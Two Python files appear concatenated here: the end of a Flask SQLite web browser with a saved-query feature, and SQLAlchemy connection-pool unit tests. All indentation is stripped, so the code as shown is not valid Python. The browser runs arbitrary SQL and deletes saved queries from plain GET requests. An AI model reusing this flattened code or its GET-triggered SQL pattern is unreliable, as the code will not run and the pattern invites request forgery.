flash('One or more columns must be selected.', 'danger')
return render_template(
'add_index.html',
columns=columns,
indexed_columns=indexed_columns,
table=table,
unique=unique)
@app.route('/<table>/drop-index/', methods=['GET', 'POST'])
@require_table
def drop_index(table):
request_data = get_request_data()
name = request_data.get('name', '')
indexes = dataset.get_indexes(table)
index_names = [index.name for index in indexes]
if request.method == 'POST':
if name in index_names:
migrate(migrator.drop_index(table, name))
flash('Index "%s" was dropped successfully!' % name, 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('Index name is required.', 'danger')
return render_template(
'drop_index.html',
indexes=indexes,
index_names=index_names,
name=name,
table=table)
@app.route('/<table>/drop-trigger/', methods=['GET', 'POST'])
@require_table
def drop_trigger(table):
request_data = get_request_data()
name = request_data.get('name', '')
triggers = dataset.get_triggers(table)
trigger_names = [trigger.name for trigger in triggers]
if request.method == 'POST':
if name in trigger_names:
dataset.query('DROP TRIGGER "%s";' % name)
flash('Trigger "%s" was dropped successfully!' % name, 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('Trigger name is required.', 'danger')
return render_template(
'drop_trigger.html',
triggers=triggers,
trigger_names=trigger_names,
name=name,
table=table)
@app.route('/<table>/content/')
@require_table
def table_content(table):
page_number = request.args.get('page') or ''
page_number = int(page_number) if page_number.isdigit() else 1
dataset.update_cache(table)
ds_table = dataset[table]
total_rows = ds_table.all().count()
rows_per_page = app.config['ROWS_PER_PAGE']
total_pages = int(math.ceil(total_rows / float(rows_per_page)))
# Restrict bounds.
page_number = min(page_number, total_pages)
page_number = max(page_number, 1)
previous_page = page_number - 1 if page_number > 1 else None
next_page = page_number + 1 if page_number < total_pages else None
query = ds_table.all().paginate(page_number, rows_per_page)
ordering = request.args.get('ordering')
if ordering:
field = ds_table.model_class._meta.columns[ordering.lstrip('-')]
if ordering.startswith('-'):
field = field.desc()
query = query.order_by(field)
field_names = ds_table.columns
columns = [f.column_name for f in ds_table.model_class._meta.sorted_fields]
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_content.html',
columns=columns,
ds_table=ds_table,
field_names=field_names,
next_page=next_page,
ordering=ordering,
page=page_number,
previous_page=previous_page,
query=query,
table=table,
total_pages=total_pages,
total_rows=total_rows)
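# Worked example of the paging arithmetic above (a sketch, not app code):
# with ROWS_PER_PAGE = 50 and total_rows = 120, total_pages is
# ceil(120 / 50.0) = 3, and a requested ?page=0 or ?page=7 is clamped to 1
# or 3 by the min()/max() bounds before paginate() is applied.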
@app.route('/deletequery/', methods=['GET', 'POST'])
def deletequery():
if request.args.get('id'):
id = request.args.get('id')
query = "DELETE FROM jimber_queries WHERE id=?"
dataset.query(query, [id])
return render_template('index.html', sqlite=sqlite3)
@app.route('/<table>/query/', methods=['GET', 'POST'])
@require_table
def table_query(table):
displayquery = True
data = []
data_description = error = row_count = sql = None
if request.method == 'POST':
sql = request.form['sql']
if 'export_json' in request.form:
return export(table, sql, 'json')
elif 'export_csv' in request.form:
return export(table, sql, 'csv')
elif 'save' in request.form:
name = request.form['name']
save_query = """INSERT INTO jimber_queries(name, query)
VALUES ( ?, ?)"""
dataset.query(save_query, [name, sql])
return render_template(
'query_saved.html'
)
try:
cursor = dataset.query(sql)
except Exception as exc:
error = str(exc)
else:
data = cursor.fetchall()[:app.config['MAX_RESULT_SIZE']]
data_description = cursor.description
row_count = cursor.rowcount
else:
if request.args.get('sql'):
sql = request.args.get('sql')
try:
cursor = dataset.query(sql)
except Exception as exc:
error = str(exc)
else:
displayquery = False
data = cursor.fetchall()[:app.config['MAX_RESULT_SIZE']]
data_description = cursor.description
row_count = cursor.rowcount
else:
sql = 'SELECT *\nFROM "%s"' % (table)
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_query.html',
data=data,
data_description=data_description,
error=error,
query_images=get_query_images(),
row_count=row_count,
sql=sql,
table=table,
table_sql=table_sql,
displayquery=displayquery)
@app.route('/table-definition/', methods=['POST'])
def set_table_definition_preference():
key = 'show'
show = False
if request.form.get(key) and request.form.get(key) != 'false':
session[key] = show = True
elif key in session:
del session[key]
return jsonify({key: show})
def export(table, sql, export_format):
model_class = dataset[table].model_class
query = model_class.raw(sql).dicts()
buf = StringIO()
if export_format == 'json':
kwargs = {'indent': 2}
filename = '%s-export.json' % table
mimetype = 'text/javascript'
else:
kwargs = {}
filename = '%s-export.csv' % table
mimetype = 'text/csv'
dataset.freeze(query, export_format, file_obj=buf, **kwargs)
response_data = buf.getvalue()
response = make_response(response_data)
response.headers['Content-Length'] = len(response_data)
response.headers['Content-Type'] = mimetype
response.headers['Content-Disposition'] = 'attachment; filename=%s' % (
filename)
response.headers['Expires'] = 0
response.headers['Pragma'] = 'public'
return response
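# Hedged usage sketch for export() above: a hypothetical call such as
#   export('users', 'SELECT * FROM users', 'json')
# runs the SQL through the table's model class, freezes the rows with
# dataset.freeze(), and returns a Flask response delivered as an attachment
# named users-export.json ('users' is only an illustrative table name).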
@app.route('/<table>/import/', methods=['GET', 'POST'])
@require_table
def table_import(table):
count = None
request_data = get_request_data()
strict = bool(request_data.get('strict'))
if request.method == 'POST':
file_obj = request.files.get('file')
if not file_obj:
flash('Please select an import file.', 'danger')
elif not file_obj.filename.lower().endswith(('.csv', '.json')):
flash('Unsupported file-type. Must be a .json or .csv file.',
'danger')
else:
if file_obj.filename.lower().endswith('.json'):
format = 'json'
else:
format = 'csv'
# Here we need to translate the file stream. Werkzeug uses a
# spooled temporary file opened in wb+ mode, which is not
# compatible with Python's CSV module. We'd need to reach pretty
# far into Flask's internals to modify this behavior, so instead
# we'll just translate the stream into utf8-decoded unicode.
if not PY2:
try:
stream = TextIOWrapper(file_obj, encoding='utf8')
except AttributeError:
# The SpooledTemporaryFile used by werkzeug does not
# implement an API that the TextIOWrapper expects, so we'll
# just consume the whole damn thing and decode it.
# Fixed in werkzeug 0.15.
stream = StringIO(file_obj.read().decode('utf8'))
else:
stream = file_obj.stream
try:
with dataset.transaction():
count = dataset.thaw(
table,
format=format,
file_obj=stream,
strict=strict)
except Exception as exc:
flash('Error importing file: %s' % exc, 'danger')
else:
flash(
'Successfully imported %s objects from %s.' % (
count, file_obj.filename),
'success')
return redirect(url_for('table_content', table=table))
return render_template(
'table_import.html',
count=count,
strict=strict,
table=table)
@app.route('/<table>/drop/', methods=['GET', 'POST'])
@require_table
def drop_table(table):
if request.method == 'POST':
model_class = dataset[table].model_class
model_class.drop_table()
dataset.update_cache() # Update all tables.
flash('Table "%s" dropped successfully.' % table, 'success')
return redirect(url_for('index'))
return render_template('drop_table.html', table=table)
@app.template_filter('format_index')
def format_index(index_sql):
split_regex = re.compile(r'\bon\b', re.I)
if not split_regex.search(index_sql):
return index_sql
create, definition = split_regex.split(index_sql)
return '\nON '.join((create.strip(), definition.strip()))
@app.template_filter('value_filter')
def value_filter(value, max_length=50):
if isinstance(value, numeric):
return value
if isinstance(value, binary_types):
if not isinstance(value, (bytes, bytearray)):
value = bytes(value) # Handle `buffer` type.
value = value.decode('utf-8', decode_handler)
if isinstance(value, unicode_type):
value = escape(value)
if len(value) > max_length:
return ('<span class="truncated">%s</span> '
'<span class="full" style="display:none;">%s</span>'
'<a class="toggle-value" href="#">...</a>') % (
value[:max_length],
value)
return value
column_re = re.compile(r'(.+?)\((.+)\)', re.S)
column_split_re = re.compile(r'(?:[^,(]|\([^)]*\))+')
def _format_create_table(sql):
create_table, column_list = column_re.search(sql).groups()
columns = [' %s' % column.strip()
for column in column_split_re.findall(column_list)
if column.strip()]
return '%s (\n%s\n)' % (
create_table,
',\n'.join(columns))
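# Illustrative sketch of _format_create_table(): for an input roughly like
#   CREATE TABLE "tag" ("id" INTEGER PRIMARY KEY, "name" TEXT)
# the first regex splits at the opening parenthesis and the second keeps
# commas inside nested parentheses intact, yielding output along the lines of
#   CREATE TABLE "tag" (
#     "id" INTEGER PRIMARY KEY,
#     "name" TEXT
#   )
# (the table and column names here are invented for the example).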
@app.template_filter()
def format_create_table(sql):
try:
return _format_create_table(sql)
except:
return sql
@app.template_filter('highlight')
def highlight_filter(data):
return Markup(syntax_highlight(data))
def get_query_images():
accum = []
image_dir = os.path.join(app.static_folder, 'img')
if not os.path.exists(image_dir):
return accum
for filename in sorted(os.listdir(image_dir)):
basename = os.path.splitext(os.path.basename(filename))[0]
parts = basename.split('-')
accum.append((parts, 'img/' + filename))
return accum
#
# Flask application helpers.
#
@app.context_processor
def _general():
return {
'dataset': dataset,
'login_required': bool(app.config.get('PASSWORD')),
}
@app.context_processor
def _now():
return {'now': datetime.datetime.now()}
@app.before_request
def _connect_db():
dataset.connect()
@app.teardown_request
def _close_db(exc):
if not dataset._database.is_closed():
dataset.close()
class PrefixMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = '/%s' % prefix.strip('/')
self.prefix_len = len(self.prefix)
def __call__(self, environ, start_response):
if environ['PATH_INFO'].startswith(self.prefix):
environ['PATH_INFO'] = environ['PATH_INFO'][self.prefix_len:]
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
else:
            start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['URL does not match application prefix.'.encode()]
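# Usage sketch: initialize_app() below applies this middleware when a URL
# prefix is supplied, roughly
#   app.wsgi_app = PrefixMiddleware(app.wsgi_app, prefix='/sqlite-web')
# so requests under the prefix have it stripped into SCRIPT_NAME, while
# anything outside the prefix receives a plain-text 404 ('/sqlite-web' is
# only an example prefix).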
#
# Script options.
#
def get_option_parser():
parser = optparse.OptionParser()
parser.add_option(
'-p',
'--port',
default=8080,
help='Port for web interface, default=8080',
type='int')
parser.add_option(
'-H',
'--host',
default='127.0.0.1',
help='Host for web interface, default=127.0.0.1')
parser.add_option(
'-d',
'--debug',
action='store_true',
help='Run server in debug mode')
parser.add_option(
'-x',
'--no-browser',
action='store_false',
default=True,
dest='browser',
help='Do not automatically open browser page.')
parser.add_option(
'-P',
'--password',
action='store_true',
dest='prompt_password',
help='Prompt for password to access database browser.')
parser.add_option(
'-r',
'--read-only',
action='store_true',
dest='read_only',
help='Open database in read-only mode.')
parser.add_option(
'-u',
'--url-prefix',
dest='url_prefix',
help='URL prefix for application.')
return parser
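# Hedged command-line sketch using only the options defined above ('app.db'
# is a placeholder path):
#   python sqlite_web.py --host 0.0.0.0 --port 8080 --read-only --no-browser app.db
# serves app.db read-only on port 8080 without opening a browser tab; adding
# -P would prompt for a password before the app starts.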
def die(msg, exit_code=1):
sys.stderr.write('%s\n' % msg)
sys.stderr.flush()
sys.exit(exit_code)
def open_browser_tab(host, port):
url = 'http://%s:%s/' % (host, port)
def _open_tab(url):
time.sleep(1.5)
webbrowser.open_new_tab(url)
thread = threading.Thread(target=_open_tab, args=(url,))
thread.daemon = True
thread.start()
def install_auth_handler(password):
app.config['PASSWORD'] = password
@app.before_request
def check_password():
if not session.get('authorized') and request.path != '/login/' and \
not request.path.startswith(('/static/', '/favicon')):
flash('You must log-in to view the database browser.', 'danger')
session['next_url'] = request.base_url
return redirect(url_for('login'))
def initialize_app(filename, read_only=False, password=None, url_prefix=None):
global dataset
global migrator
if password:
install_auth_handler(password)
if read_only:
if sys.version_info < (3, 4, 0):
die('Python 3.4.0 or newer is required for read-only access.')
if peewee_version < (3, 5, 1):
die('Peewee 3.5.1 or newer is required for read-only access.')
db = SqliteDatabase('file:%s?mode=ro' % filename, uri=True)
try:
db.connect()
except OperationalError:
die('Unable to open database file in read-only mode. Ensure that '
'the database exists in order to use read-only mode.')
db.close()
dataset = SqliteDataSet(db, bare_fields=True)
else:
dataset = SqliteDataSet('sqlite:///%s' % filename, bare_fields=True)
if url_prefix:
app.wsgi_app = PrefixMiddleware(app.wsgi_app, prefix=url_prefix)
migrator = dataset._migrator
dataset.close()
def main():
# This function exists to act as a console script entry-point.
parser = get_option_parser()
options, args = parser.parse_args()
if not args:
die('Error: missing required path to database file.')
password = None
if options.prompt_password:
if os.environ.get('SQLITE_WEB_PASSWORD'):
password = os.environ['SQLITE_WEB_PASSWORD']
else:
while True:
password = getpass('Enter password: ')
password_confirm = getpass('Confirm password: ')
if password != password_confirm:
print('Passwords did not match!')
else:
break
# Initialize the dataset instance and (optionally) authentication handler.
initialize_app(args[0], options.read_only, password, options.url_prefix)
if options.browser:
open_browser_tab(options.host, options.port)
app.run(host=options.host, port=options.port, debug=options.debug)
if __name__ == '__main__':
main()
|
test_pool.py
|
import threading
import time
from sqlalchemy import pool, select, event
import sqlalchemy as tsa
from sqlalchemy import testing
from sqlalchemy.testing.util import gc_collect, lazy_gc
from sqlalchemy.testing import eq_, assert_raises, is_not_
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.mock import Mock, call
join_timeout = 10
def MockDBAPI():
def cursor():
while True:
yield Mock()
def connect():
while True:
yield Mock(cursor=Mock(side_effect=cursor()))
def shutdown(value):
if value:
db.connect = Mock(side_effect=Exception("connect failed"))
else:
db.connect = Mock(side_effect=connect())
db = Mock(connect=Mock(side_effect=connect()),
shutdown=shutdown, _shutdown=False)
return db
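# Sketch of how the fixtures below use MockDBAPI(): each db.connect(...) call
# returns a fresh Mock whose cursor() in turn yields Mocks, while
# db.shutdown(True) swaps connect for a side effect that raises
# Exception("connect failed") and shutdown(False) restores the working
# generator, letting tests simulate a database outage.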
class PoolTestBase(fixtures.TestBase):
def setup(self):
pool.clear_managers()
@classmethod
def teardown_class(cls):
pool.clear_managers()
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
return dbapi, pool.QueuePool(creator=lambda: dbapi.connect('foo.db'),
**kw)
class PoolTest(PoolTestBase):
def test_manager(self):
manager = pool.manage(MockDBAPI(), use_threadlocal=True)
c1 = manager.connect('foo.db')
c2 = manager.connect('foo.db')
c3 = manager.connect('bar.db')
c4 = manager.connect("foo.db", bar="bat")
c5 = manager.connect("foo.db", bar="hoho")
c6 = manager.connect("foo.db", bar="bat")
assert c1.cursor() is not None
assert c1 is c2
assert c1 is not c3
assert c4 is c6
assert c4 is not c5
def test_manager_with_key(self):
dbapi = MockDBAPI()
manager = pool.manage(dbapi, use_threadlocal=True)
c1 = manager.connect('foo.db', sa_pool_key="a")
c2 = manager.connect('foo.db', sa_pool_key="b")
c3 = manager.connect('bar.db', sa_pool_key="a")
assert c1.cursor() is not None
assert c1 is not c2
assert c1 is c3
eq_(dbapi.connect.mock_calls,
[
call("foo.db"),
call("foo.db"),
]
)
def test_bad_args(self):
manager = pool.manage(MockDBAPI())
manager.connect(None)
def test_non_thread_local_manager(self):
manager = pool.manage(MockDBAPI(), use_threadlocal=False)
connection = manager.connect('foo.db')
connection2 = manager.connect('foo.db')
self.assert_(connection.cursor() is not None)
self.assert_(connection is not connection2)
@testing.fails_on('+pyodbc',
"pyodbc cursor doesn't implement tuple __eq__")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select([1], bind=testing.db)))
expected = [(1, )]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (pool.SingletonThreadPool, pool.StaticPool,
pool.QueuePool, pool.NullPool, pool.AssertionPool):
p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.connect.side_effect = Exception("error!")
p.dispose()
p.recreate()
def testthreadlocal_del(self):
self._do_testthreadlocal(useclose=False)
def testthreadlocal_close(self):
self._do_testthreadlocal(useclose=True)
def _do_testthreadlocal(self, useclose=False):
dbapi = MockDBAPI()
for p in pool.QueuePool(creator=dbapi.connect,
pool_size=3, max_overflow=-1,
use_threadlocal=True), \
pool.SingletonThreadPool(creator=dbapi.connect,
use_threadlocal=True):
c1 = p.connect()
c2 = p.connect()
self.assert_(c1 is c2)
c3 = p.unique_connection()
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
c2 = p.connect()
self.assert_(c1 is c2)
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
if useclose:
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
c3.close()
c2.close()
self.assert_(c1.connection is not None)
c1.close()
c1 = c2 = c3 = None
# extra tests with QueuePool to ensure connections get
# __del__()ed when dereferenced
if isinstance(p, pool.QueuePool):
lazy_gc()
self.assert_(p.checkedout() == 0)
c1 = p.connect()
c2 = p.connect()
if useclose:
c2.close()
c1.close()
else:
c2 = None
c1 = None
lazy_gc()
self.assert_(p.checkedout() == 0)
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info['foo'] = 'bar'
c.close()
del c
c = p.connect()
self.assert_('foo' in c.info)
c.invalidate()
c = p.connect()
self.assert_('foo' not in c.info)
c.info['foo2'] = 'bar2'
c.detach()
self.assert_('foo2' in c.info)
c2 = p.connect()
is_not_(c.connection, c2.connection)
assert not c2.info
assert 'foo2' in c.info
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
def do_rollback(self, dbapi_connection):
canary.append('R')
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append('C')
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append('CL')
dbapi_connection.close()
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ['R', 'CL', 'R'])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ['R', 'CL', 'R'])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ['R', 'CL', 'R'])
def test_null_pool(self):
self._do_test(pool.NullPool, ['R', 'CL', 'R', 'CL'])
def test_static_pool(self):
self._do_test(pool.StaticPool, ['R', 'R'])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append('first_connect')
event.listen(p, 'first_connect', first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append('connect')
event.listen(p, 'connect', connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append('checkout')
event.listen(p, 'checkout', checkout)
return p, canary
def _checkin_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkin(*arg, **kw):
canary.append('checkin')
event.listen(p, 'checkin', checkin)
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append('reset')
event.listen(p, 'reset', reset)
return p, canary
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
eq_(canary, ['first_connect'])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['first_connect'])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
c1 = p.connect()
c2 = p2.connect()
eq_(canary, ['first_connect', 'first_connect'])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['first_connect', 'first_connect'])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
eq_(canary, ['connect'])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['connect', 'connect'])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
c1 = p.connect()
c2 = p2.connect()
eq_(canary, ['connect', 'connect'])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['connect', 'connect'])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
eq_(canary, ['checkout'])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['checkout', 'checkout'])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['checkout', 'checkout'])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['checkin'])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['reset'])
def test_checkin_event_gc(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
del c1
lazy_gc()
eq_(canary, ['checkin'])
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['checkin'])
c2.close()
eq_(canary, ['checkin', 'checkin'])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, 'connect', listen_one)
event.listen(engine.pool, 'connect', listen_two)
event.listen(engine, 'connect', listen_three)
event.listen(engine.__class__, 'connect', listen_four)
engine.execute(select([1])).close()
eq_(
canary,
["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, 'connect', listen_one)
event.listen(pool.QueuePool, 'connect', listen_two)
event.listen(pool.SingletonThreadPool, 'connect', listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def teardown(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class DeprecatedPoolListenerTest(PoolTestBase):
@testing.requires.predictable_gc
@testing.uses_deprecated(r".*Use event.listen")
def test_listeners(self):
class InstrumentingListener(object):
def __init__(self):
if hasattr(self, 'connect'):
self.connect = self.inst_connect
if hasattr(self, 'first_connect'):
self.first_connect = self.inst_first_connect
if hasattr(self, 'checkout'):
self.checkout = self.inst_checkout
if hasattr(self, 'checkin'):
self.checkin = self.inst_checkin
self.clear()
def clear(self):
self.connected = []
self.first_connected = []
self.checked_out = []
self.checked_in = []
def assert_total(innerself, conn, fconn, cout, cin):
eq_(len(innerself.connected), conn)
eq_(len(innerself.first_connected), fconn)
eq_(len(innerself.checked_out), cout)
eq_(len(innerself.checked_in), cin)
def assert_in(innerself, item, in_conn, in_fconn,
in_cout, in_cin):
self.assert_((item in innerself.connected) == in_conn)
self.assert_((item in innerself.first_connected) == in_fconn)
self.assert_((item in innerself.checked_out) == in_cout)
self.assert_((item in innerself.checked_in) == in_cin)
def inst_connect(self, con, record):
print("connect(%s, %s)" % (con, record))
assert con is not None
assert record is not None
self.connected.append(con)
def inst_first_connect(self, con, record):
print("first_connect(%s, %s)" % (con, record))
assert con is not None
assert record is not None
self.first_connected.append(con)
def inst_checkout(self, con, record, proxy):
print("checkout(%s, %s, %s)" % (con, record, proxy))
assert con is not None
assert record is not None
assert proxy is not None
self.checked_out.append(con)
def inst_checkin(self, con, record):
print("checkin(%s, %s)" % (con, record))
# con can be None if invalidated
assert record is not None
self.checked_in.append(con)
class ListenAll(tsa.interfaces.PoolListener, InstrumentingListener):
pass
class ListenConnect(InstrumentingListener):
def connect(self, con, record):
pass
class ListenFirstConnect(InstrumentingListener):
def first_connect(self, con, record):
pass
class ListenCheckOut(InstrumentingListener):
def checkout(self, con, record, proxy, num):
pass
class ListenCheckIn(InstrumentingListener):
def checkin(self, con, record):
pass
def assert_listeners(p, total, conn, fconn, cout, cin):
for instance in (p, p.recreate()):
self.assert_(len(instance.dispatch.connect) == conn)
self.assert_(len(instance.dispatch.first_connect) == fconn)
self.assert_(len(instance.dispatch.checkout) == cout)
self.assert_(len(instance.dispatch.checkin) == cin)
p = self._queuepool_fixture()
assert_listeners(p, 0, 0, 0, 0, 0)
p.add_listener(ListenAll())
assert_listeners(p, 1, 1, 1, 1, 1)
p.add_listener(ListenConnect())
assert_listeners(p, 2, 2, 1, 1, 1)
p.add_listener(ListenFirstConnect())
assert_listeners(p, 3, 2, 2, 1, 1)
p.add_listener(ListenCheckOut())
assert_listeners(p, 4, 2, 2, 2, 1)
p.add_listener(ListenCheckIn())
assert_listeners(p, 5, 2, 2, 2, 2)
del p
snoop = ListenAll()
p = self._queuepool_fixture(listeners=[snoop])
assert_listeners(p, 1, 1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
cc = c.connection
snoop.assert_in(cc, True, True, True, False)
c.close()
snoop.assert_in(cc, True, True, True, True)
del c, cc
snoop.clear()
# this one depends on immediate gc
c = p.connect()
cc = c.connection
snoop.assert_in(cc, False, False, True, False)
snoop.assert_total(0, 0, 1, 0)
del c, cc
lazy_gc()
snoop.assert_total(0, 0, 1, 1)
p.dispose()
snoop.clear()
c = p.connect()
c.close()
c = p.connect()
snoop.assert_total(1, 0, 2, 1)
c.close()
snoop.assert_total(1, 0, 2, 2)
# invalidation
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.invalidate()
snoop.assert_total(1, 0, 1, 1)
c.close()
snoop.assert_total(1, 0, 1, 1)
del c
lazy_gc()
snoop.assert_total(1, 0, 1, 1)
c = p.connect()
snoop.assert_total(2, 0, 2, 1)
c.close()
del c
lazy_gc()
snoop.assert_total(2, 0, 2, 2)
# detached
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.detach()
snoop.assert_total(1, 0, 1, 0)
c.close()
del c
snoop.assert_total(1, 0, 1, 0)
c = p.connect()
snoop.assert_total(2, 0, 2, 0)
c.close()
del c
snoop.assert_total(2, 0, 2, 1)
# recreated
p = p.recreate()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
c.close()
snoop.assert_total(1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 2, 1)
c.close()
snoop.assert_total(1, 1, 2, 2)
@testing.uses_deprecated(r".*Use event.listen")
def test_listeners_callables(self):
def connect(dbapi_con, con_record):
counts[0] += 1
def checkout(dbapi_con, con_record, con_proxy):
counts[1] += 1
def checkin(dbapi_con, con_record):
counts[2] += 1
i_all = dict(connect=connect, checkout=checkout, checkin=checkin)
i_connect = dict(connect=connect)
i_checkout = dict(checkout=checkout)
i_checkin = dict(checkin=checkin)
for cls in (pool.QueuePool, pool.StaticPool):
counts = [0, 0, 0]
def assert_listeners(p, total, conn, cout, cin):
for instance in (p, p.recreate()):
eq_(len(instance.dispatch.connect), conn)
eq_(len(instance.dispatch.checkout), cout)
eq_(len(instance.dispatch.checkin), cin)
p = self._queuepool_fixture()
assert_listeners(p, 0, 0, 0, 0)
p.add_listener(i_all)
assert_listeners(p, 1, 1, 1, 1)
p.add_listener(i_connect)
assert_listeners(p, 2, 1, 1, 1)
p.add_listener(i_checkout)
assert_listeners(p, 3, 1, 1, 1)
p.add_listener(i_checkin)
assert_listeners(p, 4, 1, 1, 1)
del p
p = self._queuepool_fixture(listeners=[i_all])
assert_listeners(p, 1, 1, 1, 1)
c = p.connect()
assert counts == [1, 1, 0]
c.close()
assert counts == [1, 1, 1]
c = p.connect()
assert counts == [1, 2, 1]
p.add_listener(i_checkin)
c.close()
assert counts == [1, 2, 2]
class QueuePoolTest(PoolTestBase):
def testqueuepool_del(self):
self._do_testqueuepool(useclose=False)
def testqueuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1)
def status(pool):
tup = pool.size(), pool.checkedin(), pool.overflow(), \
pool.checkedout()
print('Pool size: %d Connections in pool: %d Current '\
'Overflow: %d Current Checked out connections: %d' % tup)
return tup
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
